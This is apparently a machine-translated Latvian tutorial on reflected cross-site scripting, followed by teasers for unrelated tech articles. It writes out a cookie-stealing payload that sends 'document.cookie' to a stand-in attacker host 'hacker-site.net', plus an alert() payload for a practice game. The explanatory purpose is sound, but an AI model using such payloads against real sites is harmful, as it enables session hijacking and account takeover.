Web7: XSS izmantošana — 1. daļa: atspoguļotais XSS

Web7: XSS izmantošana — 1. daļa: atspoguļotais XSS

Kas ir starpvietņu skriptēšana?

Cross-Site Scripting (XSS) ir viens no mūsdienās populārākajiem uzbrukuma paņēmieniem, kas pazīstams kā uzbrukuma krusttēvs, un daudzus gadus ir iekļauts kā visbīstamākais lietojumprogrammu uzbrukuma paņēmiens.

Nesauciet to saīsināti par CSS, lai izvairītos no sajaukšanas ar HTML kaskādes stila lapas koncepciju. XSS
tehnikas

Lai labāk izprastu, aplūkosim šādu piemēru. Tīmekļa lietojumprogramma, kas ļauj drukāt vērtību, ko mēs nododam, izmantojot URL, pieņemot, ka nosaukuma mainīgajā nododam Ping vērtību:

Web7: XSS izmantošana — 1. daļa: atspoguļotais XSS

Pagaidām viss ir kārtībā, apskatīsim html avota kodu:

Web7: XSS izmantošana — 1. daļa: atspoguļotais XSS

Ir viegli redzēt, ka mūsu ievadītā nosaukuma vērtība ir ievietota avota kodā. Tātad iespējams, ka visu, ko importē, var arī ievietot. Problēma kļūst nopietna, ja ievadītā vērtība nav parasta virkne, kā norādīts iepriekš, bet gan potenciāli bīstama koda daļa, piemēram:

 

Mēģiniet vēlreiz ar iepriekš minēto vērtību:

Web7: XSS izmantošana — 1. daļa: atspoguļotais XSS

No šī piemēra mēs varam secināt divas lietas. Pirmkārt, nosaukuma mainīgais var saņemt jebkuru ievades vērtību un pārsūtīt to uz serveri apstrādei. Otrkārt, serveris nekontrolēja šo ievades vērtību pirms tās atgriešanas pārlūkprogrammā. Tas noved pie tā, ka avota kodā tiek ievietots JavaScript kods.

XSS parasti tiek iedalīts 3 galvenajos veidos: atspoguļots, saglabāts un balstīts uz DOM. Šajā rakstā galvenokārt pieminēšu Reflected XSS tehniku.

Līdz 75% XSS metožu ir balstītas uz Reflected XSS. To sauc par atspoguļotu, jo šāda veida izmantošanas scenārijā hakeram ir jānosūta upurim URL, kas satur ļaunprātīgu kodu (parasti javascript). Cietušajam tikai jāpieprasa šis URL, un hakeris nekavējoties saņems atbildi ar vēlamo rezultātu (šeit parādīta refleksija). Turklāt tas ir pazīstams arī kā pirmās kārtas XSS.

Reālās dzīves kalnrūpniecības scenārijs

Ir daudz veidu, kā izmantot Reflected XSS kļūdu, viens no pazīstamākajiem veidiem ir pārņemt lietotāja sesiju, tādējādi piekļūstot datiem un iegūstot savas tiesības vietnē.

Sīkāka informācija ir aprakstīta tālāk norādītajās darbībās.

Web7: XSS izmantošana — 1. daļa: atspoguļotais XSS

1. Lietotājs piesakās tīmeklī un pieņem, ka ir piešķirta sesija:

Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4

2. Kaut kādā veidā hakeris lietotājam nosūta URL:

http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie;

Pieņemsim, ka example.com ir vietne, kuru apmeklē upuris, un hacker-site.net ir vietne, ko izveidojis hakeris.

3. Cietušais piekļūst iepriekš norādītajam URL

4. Serveris atbild upurim kopā ar pieprasījumā ietvertajiem datiem (hakera JavaScript fragments).

5. Upura pārlūkprogramma saņem atbildi un izpilda javascript

6. Faktiskais javascript, ko hakeris izveidoja, ir šāds:

var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;

Iepriekš minētā komandrinda būtībā veic pieprasījumu hakera vietnei, kuras parametrs ir lietotāja sīkfails:

GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1Host: hacker-site.net

7. No jūsu vietnes hakeris uztvers iepriekš minētā pieprasījuma saturu un uzskatīs, ka lietotāja sesija ir pārņemta. Šajā brīdī hakeris var uzdoties par upuri un izmantot visas upura tiesības vietnē.

Prakse

Google ir izveidojis lapu, lai praktizētu XSS kļūdu izmantošanu šeit: https://xss-game.appspot.com

Šo izaicinājumu mērķis ir ievadīt skriptus, lai tiktu parādīts uznirstošais logs. Pirmais izaicinājums ir ilustrēt atspoguļoto tehniku, ekspluatācijas kods ir diezgan vienkāršs:

https://xss-game.appspot.com/level1/frame?query=alert('pwned')

Veiksmi!


10 informācijas vienības, kas izmantotas, lai nozagtu jūsu identitāti

10 informācijas vienības, kas izmantotas, lai nozagtu jūsu identitāti

Identitātes zādzība var radīt neparedzamas sekas upuriem. Izpētīsim 10 informācijas veidus, ko zagļi izmanto, lai nozagtu identitāti, izmantojot šo rakstu!

Kas ir TeamViewer?

Kas ir TeamViewer?

TeamViewer ir pazīstams vārds daudziem cilvēkiem, īpaši tiem, kuri regulāri lieto datorus un strādā tehnoloģiju jomā. Tātad, kas ir TeamViewer?

Kā uzskaitīt instalētos draiverus sistēmā Windows (PowerShell CMD)

Kā uzskaitīt instalētos draiverus sistēmā Windows (PowerShell CMD)

Ja vēlaties uzzināt, kuri draiveri ir instalēti jūsu sistēmā, šeit ir vienkārša PowerShell komanda, lai iegūtu Windows instalēto draiveru sarakstu.

Zaļas tapetes, skaistas zaļas tapetes datoriem un telefoniem

Zaļas tapetes, skaistas zaļas tapetes datoriem un telefoniem

Zaļā krāsa ir arī tēma, ko daudzi fotogrāfi un dizaineri izmanto, lai izveidotu tapešu komplektus, kuru galvenais krāsu tonis ir zaļš. Zemāk ir zaļo fona tapešu komplekts datoriem un tālruņiem.

Kā atrast un atvērt failus, izmantojot komandu uzvedni

Kā atrast un atvērt failus, izmantojot komandu uzvedni

Tiek uzskatīts, ka šī failu meklēšanas un atvēršanas metode ir ātrāka nekā File Explorer.

Kas ir Scareware? Kā noņemt Scareware?

Kas ir Scareware? Kā noņemt Scareware?

Scareware ir ļaunprātīga datorprogramma, kas izstrādāta, lai liktu lietotājiem domāt, ka tā ir likumīga lietojumprogramma, un lūdz tērēt naudu kaut kam, kas neko nedara.

Kā palielināt interneta savienojuma ātrumu, izmantojot cFosSpeed

Kā palielināt interneta savienojuma ātrumu, izmantojot cFosSpeed

cFosSpeed ​​ir programmatūra, kas palielina interneta savienojuma ātrumu, samazina pārraides latentumu un palielina savienojuma stiprumu līdz aptuveni 3 reizēm. Īpaši tiem, kas spēlē tiešsaistes spēles, cFosSpeed ​​atbalstīs, lai jūs varētu izbaudīt spēli bez tīkla problēmām.

Uzziniet par ugunsmūriem, Windows ugunsmūri operētājsistēmā Windows Server 2012

Uzziniet par ugunsmūriem, Windows ugunsmūri operētājsistēmā Windows Server 2012

Windows ugunsmūris ar papildu drošību ir ugunsmūris, kas darbojas sistēmā Windows Server 2012 un ir iespējots pēc noklusējuma. Ugunsmūra iestatījumi operētājsistēmā Windows Server 2012 tiek pārvaldīti Windows ugunsmūra Microsoft pārvaldības konsolē.

Kā nomainīt Vigor Draytek modema un maršrutētāja pieteikšanās paroli

Kā nomainīt Vigor Draytek modema un maršrutētāja pieteikšanās paroli

Mainot Vigor Draytek modema un maršrutētāja pieteikšanās administratora lapas paroli, lietotāji ierobežos nesankcionētu piekļuvi modema paroles maiņai, nodrošinot svarīgu tīkla informāciju.

Kā viegli pārspīlēt RAM, izmantojot AMD Ryzen Master

Kā viegli pārspīlēt RAM, izmantojot AMD Ryzen Master

Par laimi, Windows datoru lietotāji, kuros darbojas AMD Ryzen procesori, var izmantot Ryzen Master, lai viegli pārspīlēti RAM, nepieskaroties BIOS.